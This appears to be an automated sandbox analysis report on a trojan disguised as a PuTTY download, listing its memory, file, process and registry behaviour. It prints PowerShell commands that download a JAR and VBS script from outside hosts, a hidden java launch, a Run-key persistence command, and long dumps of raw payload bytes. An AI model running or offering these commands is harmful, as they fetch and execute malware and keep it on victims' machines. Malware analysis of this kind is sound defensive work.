NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04930000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04931000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04932000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04933000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04934000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\PuttyDownload\run_hidden.vbs

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (4 events)

cmdline	"C:\Windows\System32\cmd.exe" /c java -jar "C:\Users\test22\AppData\Local\Temp\PuttyDownload\putty.jar"
cmdline	powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://eusketxe.com/s/putty.jar', 'C:\Users\test22\AppData\Local\Temp\PuttyDownload\putty.jar')"
cmdline	cmd.exe /c "REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Home /d "C:\Program Files (x86)\Java\jre1.8.0_131\bin\javaw.exe -jar C:\Users\test22\AppData\Roaming\Microsoft\.tmp\1702534343114.tmp" /f"
cmdline	powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://brahmacouncil.com/fs/fs/run_hidden.vbs', 'C:\Users\test22\AppData\Local\Temp\PuttyDownload\run_hidden.vbs')"

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Dec. 14, 2023, 10:12 a.m.	show_type: 0 filepath_r: cmd parameters: /c java -jar "C:\Users\test22\AppData\Local\Temp\PuttyDownload\putty.jar" filepath: cmd	1	1	0

File has been identified by 2 AntiVirus engines on VirusTotal as malicious (2 events)

Kaspersky	HEUR:Trojan.BAT.Agent.gen
ZoneAlarm	HEUR:Trojan.BAT.Agent.gen

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2564 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 65536 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x16200000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Dec. 14, 2023, 10:12 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (11 events)

Data received	wx5DÙ ýD°Úã' Ù10BåÐ=0oº0X³J7-ØfR¥4ºËÝ@ª5\4ÝÜ£8k½¾áÓåò(¹³\//a¸X££¬¥u5VÉ¥ry¼ÊYc¦"gî@¬=D¥ù0v¨?FS?ÇE}UWìÍôu?Ý¶þ¶Sºû!ºk¼Æ9ão¼=þrµ²¿!Ï!B¾&Â&ê"Lrþ0Y3VÄ½?4±»E"LuP-Ð¨Ns¡Z¨Snï×¢Vý:C·;=Ý&B1óð1VA}vÉMºÜ¢¿<Ç³6VZD©ÉgÑºXÄõF@£v1®xéoÏ%Êµr¼Åh ´úPáô"ú»qýwã"TêµéïÌeªt9'ËeYd¬1[ïñ) òR BµÞÛ5£ÔjFãb¹ºQæ]Poï¡}ýÄÑ£é\ï·1HÛ_ùÎ¾®³÷õûB÷zû.ÜéÜ;¹ë»íûÚPÊÿú`ó\|êcCû§kN",qò¿ÒÎ©îkUÎßd»zÊ2XË5±V¸µRkÝS®jáq"¬Ö:DØÑZNmËøE-è1~ñ>ØíÕ¬¡g5±1Så©ll¼Vùêä©rù äÙÞLkëµgäiòZT(²ÍÕép£öh¡<]^HÉEtÀ!É3dävókå áæVÊ¬mßâ0Í:Í4·ºæ6Ý4ëí¦¹½UÝ¡÷û]Ö±ÑòØûHwKö¶UÆel´¶U¶Â{¬Ér2¶c Ú \VØ ¯°Á¾ÂLmmyÇ:.ZÇx=èàÕ_î¼¶ë¼úðãõ¨u<y=æàµSãµË×ã:¯»»[iÙ¨kùu\|´<qÞëà<PÔ9á)Æù u<9?íàüÆùYÎÏééZòØyuf/Xs£å\ÆìÙpy82{Qg6\£Ù1«M¶!³WÌ^Ó½îÂì Ù:3î.ôÅ/·æEËyÙ;fåÁÈìÎl°ï2fï[SädöÙ³&f§ufÙð±ÎìSk~´Ï}æ`6DÌ>× áÆìkªÌ¾u0ûNcö½³tfgìøc«üIçüuB´<qþÕÁ9]NGÎ¿éÓEøqþÛ:Lí q6pNÎ^ãl³ÁÐ³ÁÍÁ&MN î:4Ñ@× /ëPyèÑ`Z, Þ-ãÔàÓ ÷mU_hñ¸¦Vz}D,¦ëLûLû[7··âÇßÎá?Ç<?/³W¯þöW-ffMÖØß·'µÚ1ù÷þ´½Ì6¢ùê_@ H;VÕxÿ"j;cÏÞËG[ÿGô±9üÈþ6þ\|qº°)«þ)ÏJYÿ_[Zü¹ýÿn¡ÿ¿J)~3ðKï3ñK_þÉßÞusÆÓÿÃþ3þGþ´ñrÓÙÅ;Ïù)Ù?%Ê9¿L!ügûþQQÉÒJRojm/²Ï-¯ëï%.±ßL¼þIù/ïïÿâ ^°èäÿv=çxõ¿çÁÜù&« k/ëOsÕ¹ç°¥ö0º½ÅL6Xã¢ÆØÏK×Iôã«/n¬½\¹IÃ?!1G_Cêyü±¥Üçð_ýÓkûÐîÁøL[ÙÇâ²/P§T\~/g=öÿ£.hD¹ì!å²NÚÖJD®Î¿ì¹\QÉÁsùß!3Øý¥qoÓîüóLÉ[gFIôìhYËs¤ô¿¤ôoë/çTñ:Zó×þJä_éÅ°êÿ%h3Yöÿd2½¥ÔüïKM/ y¾ÔÞçôÿ·¼D9ÿÛRÅ¼4Iÿ{^ª¬þûÐÿº¨"í¿)ì%Èû/{ñÿk~{é2k"Gü?rÿælp¹Ñö¯ÈzÑþ^¼çòRHþýX5?ÿPKP³ 8³PKftWFIlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/lllIllIlIlIlllIllI.classµX@Çµ>Ã,ìd_Qº QPqAå÷ý\`dYpY\|¡1¦&1&j¢¦%Ñ<LÌÃ©¤insÛä6Ißíí MinÛ{ÓGÚÛÐ3ÿÿï² 4Iÿ?g¾ùÏ9sÎ3ûúÇ_¹SÉæ¸}n·¯Øçsçø°Ðþ}¾·,5ìöåèÍî0OMVÍ@°íÇ_£V¼J3Pù]þõ p nºðOO"ç`\|XKÀÑÅÖ÷J.jüU³´®L©)XãË©¨÷W4^0§¸Æ_ë,ðÕWÔb¿eMÞ&/vÞú©g6Û¸ÝaÍÌÊÇÁBærpNÉº5õ9M[¶xÞÊU 7ìÙ¾M0MÏXÙÇ®úìÍà° bÀÚî¶½ð´·u·?Ü÷éèn?¯Ut´£þ3ùçPòåîö®î³]Ým§»Ûîèn;©UÂÏÕîs]¡½SuÃ@pþ3ùí/Ê¾m]{Úu»ªè+Ø òÛ¯hüGúZ ÍrÍ%=çºzÛDÈ>¸\|]Â¾¶Oº_êmìÿ<§KFöÊ}X3xö òg"¬q%BÃÚRþhC¾®xXú±ý ÞÑëùºCÏ÷ §^Å¹£ü1!ùWú4u{_Å^è;Äà·ýüqüöO#¯¢W¥CûKÓÓF :Z`\|H~_oÿÃMBò3úÊßûÉï ÉÏ Ù_xðßkìP\|æuöóÉ7ß±¾N÷]øÜ ¿=¼Ê:ûÄd[¦\|[?;[`ò'ßõyµ¿Ú@ÂküJ¿Y[ ÷_î>.ky[¤üiÊ7lu^îWíúæv¹ok¡ÿB8)ÄÓß;\|[Ä>)wÁ6·Ì¤Ûçüî¼kÆ®©Ü¿-X¬jnÞðí(÷[ @ÞgÎN´³W}f¸ûdAkÄ:~cVá¶Ã\(°Á(¤îûÆ1é6Q0Ã1³µÛA±A <;ÄÉsz1¸}¡©(Hÿ\|9[& P>á.¿£ÂÛ¬©÷¡æÿej:uz'ÊÑ#5)£Ç8í0ØwhC4Õø½3¬¶ÁpÓD`1ûóhiõâ üÒ îÝ`°É`3ZÔÓÐàõWÈÈ_74£r¨ÊcÏÔôÂÎ¸E2Vaæ¬×?HLP¯Øyk $ ¿¡@ô-²>H´C=4ØÀÛè÷K"û_Scµ2füÐDswÌú-&&È¯¿6Héý°¼É¬©óF\|¿nzjì5Ú<mHe¿ûA£,`ÞÞKgÖ¿º)è©õöfiùVoE§¹Èè½ßLëÅÄK Äî ÷Ã4olj]\|òoëd1GuÿìñN'·AMnJÏþú~zË;¦Ép÷û´Ù¿Ø[ 5²XBK¾óÓ?c:??¨ªñªö4V[àA¹ÐLKá!ª¾Öå£¶ÿ&Oø¾þP¬X×ÛÓR÷Ô÷ifÝK-²¨E#M_c}Î\|íÍ.º~ÏK)6='Å¦¾q¤¯+(»·Ííz«¤ÑQú<Så 4½hÙôuv¸ÏÛ :D+0Ã£5!~jO ÑDù¥'PY¨ãF3\|~º`Ód.¾¡Áz^²ÂU¸F`$j=8§·ð²Tå«¬5¨} ÐÔ¤üí©´úOmG¨5¹æ:]Súì±ÓÕÏþý¢,:eÑNËªýiò{¯î"0Â >·Êã[Qáml»7lð&º~Ås³? µã^m¯É 6ÁÛ´ìXA4ÆzÏë Øá»úþø=ÚøÁõ¹D»áæF=>¸H³k.ÜýµfüD }ÖuïM¢«¿ù£SSìË×1(þÞú¦·<Xá VmµÀÏ¨%ú;)ëüE5m2ÃcEÃÌóxëêýÒ[k¥~¿Áý:Ô{×oé¦q__#Ïý %¾a§Ö¢Ðe'³¦ÿèÒ_-´ÐÚJç{:r`}÷ÐjÔ·ÑÞþ_øPZë4íâ?óFÜW 3ürã0fø+
Data received	3.¾ï võ\kÿ¿ÇÂßàcñã·?@kùñ¯ú°DÑÑQß«¢ó`û/´Ó^y+÷÷Ïe2;!f<-[ÉhAô}t\ó7e±J4»¥Ðí¯WÔÑø[ßC¿5tÍk(º[Çe±ºï¦i/Ñ ol5Ñ»§Ëb,fÐÂîåVã¦Ï¥-¢»vÝuÎ ÎZ!£ù!Jþ;fbèÇÞ_+Ü_HHà<¢ïþ¢Poeïº"ãèÜStD<EW¿<ìÂá0áÐÎg&t÷èã/ÒO¿óîd¬4ôDÃLzT<cV`zc&ÄÌ-)-_XZ2¯7¡O õ@/N!¹V2`¤D×ËN`ZúGÏ¢O1IÌ ã¯?xw}«f®ý,¾.·húmhíh§¾ãvÑ÷Ï>BýSÛÐ=3íeQ&"Ú\ôáA:Ñ×LÝG?),£ÿHcÂèÅÅ6øÓ¢çp)µLÇ;Cþg4G'f²TþÌå6Bm~öµÒ_,Úy9)³eDÕÒÍÞoF'9NúÀ6.Wâ¼ÄÓÂVUV¶Z3WË×NÖÊ\ò#²·í_·tÜ¾úÆIb6xNMÒ>ÝÐfâÁC §Æß¸ØÛÜ/2¢E:§TÚH9ñÒÅ-C¾KMÁ¿Ä½«¡ w°ô@Æù©![¥ÐZøû¡©Ôrbô}(ÔSYi'õ8_k}4Oö&-ù±,~.?ÐÒó¿M£3~^G=pi<¦8;vËÂ+mìy4>±óºh¶í0m~Ãþù×ò´ªkÏv [_G[£=15®Åóª¬¦Êï â¡!YX_ÄÞ0ãÃ<¢¢Í¦zÊ}^ Óý}2åB 3^m0ÄºUþxÔ)/'øý6í{<$È;Ö%W(øå ¢Wjò®0ÇKø$=ITI.CbRR$VR%QFHbVFIbQnÅ(c5jVÒ4jQÒ5jU25jS&h4Ö ve¢FãIW¦ht2U£LMPfhTQ\eÊ,e¶æµ¶æ+ó·æ_¢Å°(ó9(~ä ,Di3Úó´IY¦,Ï¼jjkk«WVðx$%Ùa+ú¬q¦NX¥¬Ã/àqÅ:MÎØðº,Ì&ìN·ßÛÕ.«ÓÚ>Íí´u@@iÔ¹b1RÙiîíÊ-Z«¦¹µß!SG]Ç6tù²KÙ-CµlÊnCYuöå¥YJ«Öò,dwÀA©åË°ÁÜ®sÊqÑÊ!Dð%å°ÖzpåNÆmÊ]X©VîÆ²Û°á¬¶÷ 9rTc¼ -k:áÞ.å> >ÃmÌÌïØÍïä¶{S¹"ç'³¿4e÷Ñän¤ccú`Sk5Y9¡UûC:< ép²WSº§5¢IWhøarÜ·î-¹tÜ£~4ç,]£\|¹Ît)ma ÎjµUÊ9½åã+R°äjïRÎ´¹ ióh¯6éÚ<þi´#u)«{ß4{÷·O¼"ò¡AbÄx ]4tkÁ Ø ï8-¸Ç&§ñCÈ!ó<ðp@¬hèô@Öém^d5øb·s¾=Û 4FäkÙ¯Ûx·¥GnýEM5üÁ,»>b º>È)eU÷=KzXÇÃI>vÑÚ®h¶DÄð-.3Íc)ùNsêpÕ$bY¹Øà4óX¾Av/6"²ójc£Å&Dq\|jñl½Ø(oV-b#<pÊbc«D9BÆËUf ,[T Là³Í^©2«p°ÂÐÁ½®ëD6LlAÈ·¨,VpæU9¯R]àN$ª&ñjÅ¡l³¨A8×¨¨l2[#¶"Læ[Udt²¥¢¡×ª"\|S¸Oe bÛ%êãunk©lð#Lå~9ÄpV êçõK#£áÞ 2.F²bÂ\|ÊÄ(¶[â £ÙÑp4oTY²¸ÍA7ñ ÊbLhB47©¨ÐX¦íÇòíÎ\|.nA8ß¢²TþØ0ïPñËx¶P4#ÏU´Z:«;¦ó)2OÜ0ßª²Q"m-3y®ËbÅ.Y\|ÊnX@ìF8ïVÙÍªÅÙ\|ÊÆ,KìE8ïUÙ8Ã¦}sø>¥I¬I´"Ä[U6^Lfb?ÂÉ\|¿ÊÒÅæNáT!rÑ·!Ìå·©,SL5¦ò1ÕÛNã·«È'Øq¡àTé,w ÎïPÙD1¾pÿÊrÄL´Ïa3ùaM.´Ï]üNM³Ø"qÂYü.M³q »Îæw«,Wä±Jqa?¢²©"ºa>¿GeÓÄÍ¬TEx3?ª2!æ ÿïE8ß«¢!æbpßp.¿Oe3DÛ&!,àÇTtt![,#,äÇUÝy8Ø óø Ã~>«÷#ÏïWÙl±ÍõÂüå"´ÜIEü¤ÊòÅBä)ù)Ý,Ü,(N#tóÓ.·E¸8D¸?¨²¹b1«_F¸YÅÐ-Æa1Heb ®3ð3'JpmKxÊæRæ³KùY-K1Ï!\ÊÏ©¬H,Co·#\ÆÛU¿å#\ÎV[á{aDEKG¨òóZb»p¿ ²b±ýû(ÂüQ Kæ5Üü-ÜvÊ3¹%W¬rF_OaËS â¢3_ÌñUü±V±¯>*Ö _£j¬kækââK âIød®x¯å·u\|ÝQ±^²®W¹
Data received	âÐHsÑH h$ÅHµh¤,4R-)4FÊG#% Æ¢ú¡£²ÐHùh¤d4Ò4Ri))o1Ò:4R) +~#¼íJMT%_UÌªcU¥À+Þ¦êò¬ªÊ¶Â4xÏ"\ ÿP"Ùèå¡ÐÆÃà]Ûv&©ÊTýªTpU¨&e7ÒyT«Wáeágáee¦;¼²Gq¼b÷øÜ C]Ü¯±¨ÜÎU¸Ò¥Y)c÷&xã¾h.ÂAºY§óq`Å-d[(j"Ãwl54-º!ÅQ«HYN´ íé#ÊRÖ2I«ÜB«B§µÜBkNkªtZúËÊJV¥¤Ue¡UÓZe¡U£ÓJWÚ6\|¡u!=@"[É$Îúè¢cF¯ß±oÛKßvÜ´wU¾jgý.µ)ÜÀFðÈÐG_Gé^7Ð Ü@¸pÈó=cð }ð£AG¿§ÁàuÈ³}Hú?ú'úÅD¡É@eDá¼^Ö×³v»aâí0k43äåtp^nØßÁyAçµÜaÆup^nt^çÕÎk:¯U3¿ó¦ÅyÍAç5× t^Ðy[×lóEç5×t^Ðy[×dt^nt^,Î«Îaj1ÂÀÓ#LFKéb0à@ÇáØñ:pl.êy"ÍsÌå$ëÇ c'ýèþ¬ÂÀáâ§uªRo8J±ëXí¶£gJHvj¼¥¬Áx3Ä#_Uµ¢ ÞRðâ#zø{À@ÐRAs:¿tqwV¯áOæ(éèZ$wgE¹;¦áo!"(ßA=AsAé ¥þ6"ÒAÓ: ÆöÑ/T£Ño-(4Ukýz"Æ#Ò@Ã43úå Ò@Zûè×äG¥#Ökfô[f¸fÃ]ÌÐÝEÃ:ÿtþ#Ã×ÌhF¯ÐLw1uîB'5ª4É û5ù£Ã ÕLTo`¬fú£"ÍôGé6¡QGif&,·ÜÓÐ¨±hÔ4j¢f&©hÔªnAµFÍE£ÆQÃÐ¨4êP4êH4j95:ÉbTkÞFMC£.D£úÐ¨«Ð¨hT;ÕF-ÔÌ¦F]FFy§½B,zô èüèRÑ+¬µxztô áèbÐ+hèâÑ+ÌB¯àA¯!£å<"Í"ñTwÖ§£¼3PmÊ{z²(ï,ôl¥½ø·çÏÃtt>öYó.DyKQÞE(ïbÔí·ïÆ,EyaØGÞ0E\ò®À@yW¢×¯Dy«pÞjw£«á° CJ$Cä¤ âgÄâ âTq¥fz¦ZÍmã5ó¾Qfî&kæîi¨fnç!3ÄsÄ1â¹âxq.8A¼ A<A\ NÕÌÄ\îhfl(ÎÐÌÄ\|¢xÌ%P(î¦µm#,(nÐÌÝÓÍÜ=iâDDñdDq¢x¢Ø(Þ(~2ÃÄ¸A Î@³x8 AgqÄ~qx0x¸A<A<A ¾ A ö#=ââAâ8A<A î ND"SÄkÄYâ ñ±A ÖÄÝÄÑâþâbx
Data received	x¬jÖ7Qew·ëPiøÑG¹ê²×G7+°à Í ÃÈLaú ,vÙ-æb6d,O÷Ä\|ÛÏ8`l©Ö¿¯¼#³MÜßÂ)E¨Â w:a;øÄjJýûfNYæyÌ¬¥OéD5°ShõÉ6¬@¶¢EóÅ-{:¡êÄÂzÒäSï¾`^Íno/¯ÔW»Ýðm÷¤AÀ +LÃQ»ß#§xVi°WÛ¾@MÃÞcö1¢$ýã® k£öÃìêèPÅabu½1ê#B«28ªº7ïSO$JÜ{vé8LºÐ$®ê°ë§±Û>ÌS'õ¦UÇÄ)¨¥o«Q?û}¢(÷2* è3Wa©Y/Às¢þ>¯ü {ºó'ÿSÍ9rK»ÔìåùXþØ]¼:`Ô´ª(Òàub¦5Ïÿ¡Z>jÁ:5,èV`DßÒÆÚ`Ín_¿:Â(_Ô2jj3ª½ Õ:´úµ©>§¦~ÐªF pôª~Ko:àó8%nÃ¸4U;üSÕÓ3¡TuWýÏ1uýïJO)SSôõhá[ÂÂQp[å_êIf(½£½ç#µúÃ##(\|ò{´ïÑ ÓÌfs(rç(3DÒQ8<Ò9_¯: ºU}ßÈé(±_%ÅÃTù<P@Ö¢%VoEx¾æx«\|A¯ Nøº8vü©£åZ´ieµ7A+½µÛ½íÅ&nÐàÜu\|ñ©X2h5÷ú&\|ßo)0 ýñ3Í«õ;B?G½ +ýòvwº¸w¾§ÀÆpèÕÚnÛoÛïÛo ØÞnÛ;d»nÐ7[ëq¹äx¸½G´>!]áÖf³¯Ã_ÄL³uÚÖc-·îò¹p»Ûz:ÜK®[ÏõÛºËÚTÈÿa\|±ä\|¸½5Ü~×ÒÙÔP´AõÈi~ÛIkßvüfïtøë~òÑx®î~nùBP¸õB¸{ÐýZ(ÒúFPþ-ù(DÈÇñN©Ù¾noÇBùpkoç¹>§¡¹Ð·uø©%_øôÕOSoðmÍùÒY}sBÍæ^:üùÓ$÷µwû)ß<ÔNé¸7-×´¾¦ÃÏ\|Ü+tvh#\|æÖz]Úÿc)¿+{µÛ{ýxSDNèhoC§Ã¡KáÐpèpû[áÖÇ»]:)åòÿØ§õÌÐ¾"O}~ÝD»'3ÑÿH\|>~á}3Ô;dl²Ä C-9Éß¿ï¿gïN \|!ß,\Z2t¢÷:üãú`í20àÅük}#b»ÞêÌéù#Éùÿ<H~o;×ï8÷[[äHg¤LbÏk¥\|û]~-ä÷Ð,_1¡r'Üý«ýRõLÿð¢I±½uøW¼¬ëjð¦®÷úñgVtqÝvdqx{TîZáçÞm~¾PFáëà7Q¼S`/FÔxä'Äk9(ðoØX\|ïåØ×q,þ;¢r\)f¯0}Rf$S Yö»0Ìí6Rp ÒtùÀ¬Æ¹mÊJ-×/fÙòéÛ >çÄÝon£J²Ì½¯«äy^MNórYÃËíd/×È^®B^Nì$©F¶ ÕI-Ò2 ©C>%3:ÉF¤qdÒx2iY ÒDâ@jX¤I¤i2YHx¤)²?#ud¤#Èj¤©d?Ò44]J)¥"%H3H"ÒÑdÒ1#K
Data received	ÁÑ« 9V2é8¹L_ÉqêbCNÖÇËõúHWòH=]Þ«/dººÔSô åjHNP« y!/Ñ Hf¨!Ö3½ú2HeªË9UÏ÷éË!¥.7ä4}¢¼[_Éê C£O³ô¤®4ä±údy§¾ ÕU<NÏwè5ÌVky¼#gê«!£®6ät} ¼SÔ5Ó}Yçt¿êSýÇI}êËÕ§jÑçôzÈ©o×kµhµ6W_§NU×Ð§©Óé¹PHÍ5°ètÍ{NotC»^ërõõêtuý}:ã®ó¢º¡ú¢juß%ùá§èÜðZ-&K[{Î×b¸º]§ïé´¬õÒT8XðÂÿøà¾Ë7»´²À¤K«~m)j#õÇöYG ³ì]¬¶ñ^_Ë +´H¡Åô¨¬ò§iB¨QRh©B´¬Và_CÊStøgÈ8Vb a#ò³ëÁ©xÛv+ªúmçò¸/³F±Yc¦yHó¶í·Ex¦éAãÇWÔ^³ha\2 ïØk¤¡Ü^Æ¼a/cÍeÌ¶hÀeLªe$b9Ql8®¬°À hk\xáéeÌ&\ÆLÄeL.c&à2FÇeÌ \Æq³Ëµ)0sÅáã:ÎÃeL9.c2q£á2fá+îÅeL'.cÖÎ¹b.cjq³1í¸çZÆLÁeL.cq£ã2f.cfâ2f´áêøpcà2&Åî¤Ñv'½jvÒsrê »±m¡öö×pv- g×báìT¶·e8Ç¹(ñÍ(ñ sÛi8îgÐpvñuøøxJ\|J¼%^d )ºÔZ"ç\Õâß§PXö¡V¡ËÔZx>EÓ+&õÐ\|«ýÝ ÐUVvØ§ùzè¾Õ~ÌRèZû_ó÷ÐZ=V=BZZÎp 6¨µ\|±¡&&¯kó ÝUh±ÞºÝjm;ÏÚÄß(´ ¸÷¯Ðf¬ð Y¥ÐÍ&j±¯Ð-6®k«W«« q) m·ÃÍRn³9Óâzh¯ÆáÆc»ÍAB/ÝÃZæ<$@ÍÝv»{D»{]íví^áâáJrîÀÃ~×U×®«M\×¸\|gz-VÈ (ô:HôÐzP f ýýð:ÎØ\¾']¢ð=iúé¼ÅZIââz(¼ Þ&øZª-Ðò}èRïC/ÔÖisµ§égz'"ÓÖñn N8LÞRè]ý(à D´Ù@µI¬æ M¾[4°L+ÓñixåÐ@V Ücóþ9Áû½.Þï3y?¼»wîk-ãZ{ËØ{/`+&þñWð¹ï¨ÞÏ =f>V¡ÇñuBO¼ðù¤MÂý\$<hð¥B BcZ¡Àoîgh=ôñp&ÙãáL§Î{>¯ej3µù½ôt8K¡½f3¼=¨M<E¿¤OR'&é }?GÁ¢u¯Ð/c©¯ôk&'Ðî6ÕßT¿å¢úmêwL¥¡I ýÉñËo,ü±G3çpQôõ¿ÅÆÀsòôBõM>ñ9§ ý¶IC¢B¿ãö»ø¬ÐïÙC'»þPh@¡jOÓiÙâÇ6í?´¿ë¢½Ï¤ý§ÖéxNëËÙ ÏñÓ'_Ï)nzæùs«÷!òXªB9`0þÊ¦í=AÛ¯]´ýÆ¤í·6ün@íßýú?¦6¬SèlÒB=ô0TûP+åi¥Bÿ×LÓEé9à=ä¤ôÏv¶Êtö_aªz~W¡5?«ÓÂà6þM$÷Ðá½r¢Ð¦ôHÑº¦ji¬"y¬bäL8 TSµ$mjä×Õä#$CbmTµúHE íR¼ÕêE·Ä$% $ÙbBý{]SýÎ(Ò0»®ê&ºê7ë¸´îg7òþ¿ýÞ{ùäøÑ7â4»×¥$³×¥d÷s4Ò&!E0ÊEÂhT\|6IÒÌº+Òþ}.µq¸Æ»p¥¸&8SaÒv\2àÊ²qM¸&¹pM6qeÚ'åµi8¢HSmDÓ¢\¢é&¢"½¿QòÌôÉpûi½R¾ÐpÄ{¥Ùá¢^i®ÈÖ¦iEZôi:NÆUWKÑr¹ÁÕ+ÍE¦k£´é<k´ÐºÚhmO§j©\|NHS¤ùf£á1}:$ÏfzE¯T$px´Ùjæ©Ò+{¥·òµåÕÑz'w¶ÏCÒBñu¶B[Ã[Y©ÔÒøËª^iø¶V[¥åY5Z §`5`ªÒVWkc´Ù§É>Eã`?«HäGÐ:?.ÖÆ&êZ1?§H¦äÛÕÒñ\G«®Ëù<ºoÿ~8¢HUf%Õ9aU¤ÅÂW¤%¦<ZÃé½!£¥ks´ñü83 /³{y¹èå®^^iöòg$ÄÑÄiüÅËws)Ç_ö~¶;Î9oU¤gD¶FÔ\|yÒMÿÚ~:éF°®«`Ï²HMÌêå¤5æµc>&5ÒMÒsÒs¤4êª¨'Á+õì÷<áyÂ:óòd©ÇÏàúÖç¿ùÐNñ_ ·÷jÎ¹@¼ÿ^ Smí?Òèàý·7ãjÍË7<jkç]6³>qÎëÍoQýOÍyQí üÿ2 xæ¢ÆÂpbRÁc¶À_üb<Bìe dhª.S Ú]Û6ç~_pµ¾q9tHS.ÿIÐbMÄQfþb Ç¸ÿDÃUd³¾b©LìCörÑ?ÿjR?tsÈõÇöfä .çÇ¬;/¡M3d¹Äã.½å!Z·"s.¿u ÿÆs¦ØË#æß.OTs³õ¡ükz÷ óáPÛç\ /ñ¥5êý¿1#VÒ\§½~»µê²bví¼k¿_®iG¬O¾ÙÕ>i×µ'Öfø+3CèJ1Ï5 ü»ÿ.&9j Å^rð2iÆ![Óì¾JÍÄÿj¥1\|øü×WYVCáßýC]'õä ¿¿jÆÍeqs)Aòð`Wr¢®³úlç¬o"XõÛ]õÝ®£¢<Ã2ì0+h×ÁE¥ë¨¨.fâÁEá\³óáÁE\LqÕ»'Ê0ÑuT´Öp® mÀ£¢<JÂ£¢z<Zï:* áQÑf<* NàÜxTGE¹xTGE9sm¦aßAã§ja<Ð'.VÜ'j. µÄæáY7'®ÿp¡#9%ó(R´î ñã:ëÖ,G~*Vâ±Y"^ò]¡JK9Õüyûï-Çþ\å¬¨9Nd ^üY1Jkµxà´£Öc\R-Öa{õ°¼5Çãñ¬ë?\¢MØÍxø¶ã ·`0`öÌV9jEqµáAW;ýmCþ;ÛNl½ñlÇpx¬·¯Z×¸>îA÷b,Q7Öº¹»[Ü'¢ÒösByÔ\PDÍÍQsI"j®SDÍyEÔÆÄ]ïA
Data received	sÅ"hn;hn!æDÐÜH47\ÍAsEÐ\§+Asy"h.<XÐ\±As#DÐæ²0h.JÄÌU9$ù(1sEÌ\)ÆÌÐ¹\åyÐ\)æ ¹:4lvò{Ñt7åNûHÚc]ÎÜââj²ËjT£ÕVc=Z h5ìÓoþÿq#{o³/+vt²áDöp5¶i8¤Äi6eñ¨æE`q´.sVPÀ\|ü[qÐ¼ë"°É[½¨ÖE`nYFãMEv]æýMÏ<>%rnÝbËseÁ/a;`îXoqXXawX<nE»ÇfÃ¹,ì7^n8ÑËÛ çÀ~áÄz«vuÙ¼l1yYo ÄöØØîÛ"#±ñÊª5¥TN(vÙ>ÿ¾ôpôÐ-Ïs>k^}ôâña/ïq ±Ûc8Dðælw¶[BlE!¦Nø$b6 1B¬6y·SQ.EÁ!T* 7³cð~,vö8ÕxTÓ1 {Ê$ëfâ¤p"N³Vð&§ÇçVð&oeÆ äòùe:jÈþªã¨ÈÃ°Ê(\|LÃ8%ÌBºgc?ÍA ¬àÍj[µ#¶:,0Õ!lÃX`Yª½Øp\£·ÌîéÃCâ\|ÛÆÃ¥Êºª8ç»zZÜ_bãÜakÏ^S{`Êqp¶µg¬¿hØ!3ÌpîVåæRù+®A¯0uÐ8òu)øïD¸9§g/ÏcàUüM¨<¥} Úë .åÙàR"Ã¹Ê³'§ÃpBfÄUüi¨<92÷ á,B.íîÒ¯á\æý:;Ç¹;é/¹r!]ÜE[èÅUvËõÖUi !ëjEªU¤:;%AêÕx(r&E+RäõJÂEjÂÏÔÌ³ÈÓa¯æåÅ\|O6Åbics{¥j8ôâ7Y¥v=NIQãz¤®°_¶c1Í¯yø Æ¿iæFéî!íÄ mî·&EÚ n5¡gíáïi/<ñ(®K;'W`úAr"]i#Ú'íw!ºÊDtái@¡&8§= ÖiO)üI·\|¸v><Ç?üð=¯Â3I®6U¤kðu"]kæÅ3= H× :Gìà¼OÇÐ1¤Úg\|Ä^ Çl:BÔíAº<ZjïBüZ~g5øÕàsVów¾}Im\rÄðÿË¼ð:Ô, $uB®W¤¢ÃGr-Óé ªÁó,é¬ôèQj?«czt¯t£ª³Ê85ÏK¡ÉùïMXµWú´(¨HÁÐÞoÐ±àÑjí<ëVþ{<ûkNÇjö8É»ölÏôMÁÝWÃsª+ 